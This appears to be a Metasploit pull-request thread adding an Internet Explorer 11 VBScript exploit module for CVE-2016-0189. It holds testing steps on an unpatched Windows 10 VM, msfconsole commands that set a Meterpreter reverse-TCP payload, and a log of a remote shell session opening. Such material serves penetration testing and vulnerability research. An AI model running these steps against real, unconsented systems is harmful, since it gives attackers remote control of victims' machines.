Internet Explorer 11 VBScript memory corruption exploit

[wwebb-r7]

This adds an exploit for CVE-2016-0189, a memory corruption vulnerability in Internet Explorer on Windows 10.

Testing notes:

• Get a non updated version of Windows 10 Enterprise such as en_windows_10_enterprise_n_x64_dvd_6852541.iso from MSDN. I prefer Enterprise as you can disable automatic updates via group policies.
• _Take a snapshot_ just in case you don't disable automatic updates correctly :p
• It's not 100% reliable. I'd guess about 90% or higher. If the exploit fails, make sure to terminate any running Internet Explorer instances and then delete everything in C:\Users\yourusername\AppData\Local\Temp\Low, then try again

Verification

• Get a Windows 10 VM. Do not update it.
• Start msfconsole
• use exploit/windows/browser/ms16_051_vbscript
• set srvhost your-ip
• set srvport whatever
• set uripath whatever_youd_like
• set payload windows/x64/meterpreter/reverse_tcp
• set lhost your-ip
• set lport whatever
• run
• Browse to http://your-ip:srvport/uripath through IE 11 on your Windows 10 VM
• _Verify that you get a session going_ If you don't, follow the testing notes above and try again

[wchen-r7]

Yup, not 100% but works for me:

msf exploit(ms16_051_vbscript) > [*] Using URL: http://192.168.146.1:8080/lEgSGQe2bnEV
[*] Server started.
[*] Received request: /lEgSGQe2bnEV
[*] Sending main page ..
[*] Received request: /lEgSGQe2bnEV
[*] Sending main page ..
[*] Received request: /lEgSGQe2bnEV/efoc2W.dll
[*] Sending stage two DLL ...
[*] Received request: /lEgSGQe2bnEV/iICXX7.dll
[*] Sending local server DLL ...
[*] Received request: /lEgSGQe2bnEV/UQY7t7.html
[*] Received request: /lEgSGQe2bnEV/p8lDkbmy
[*] Sending payload ...
[*] Sending stage (1189423 bytes) to 192.168.146.172
[*] Meterpreter session 2 opened (192.168.146.1:4444 -> 192.168.146.172:49773) at 2016-08-03 13:51:52 -0500

[wchen-r7]

I think I will lower the rank to normal, because I have a very different experience with the module. Most of the time it doesn't give me a shell. But I will go ahead and land it, and then if you want you can come take a look :-)

[wchen-r7]

Release Notes

Microsoft Internet Explorer CVE-2016-0189 Script Engine memory Corruption - This module exploits a vulnerability in Microsoft Internet Explorer, which was originally spotted in the wild.

[jrazer]

Possible to use it with Browser AutoPwn 2?

[void-in]

@jrazer Originally it was included in the browser autopwn2 but due to the reliability issue, it was taken out. Browser Autopwn2 only include exploits which have a high chance of successful exploitation. In the original PR, the module contain

'BrowserRequirements' =>
{
  :source             => /script|headers/i,
  :os_name            => OperatingSystems::Match::WINDOWS,
  :ua_name            => HttpClients::IE,
  :ua_ver             => '11.0'
},

This is required for a module to be considered for the BAP. However, when it was landed, the above section was removed by @wchen-r7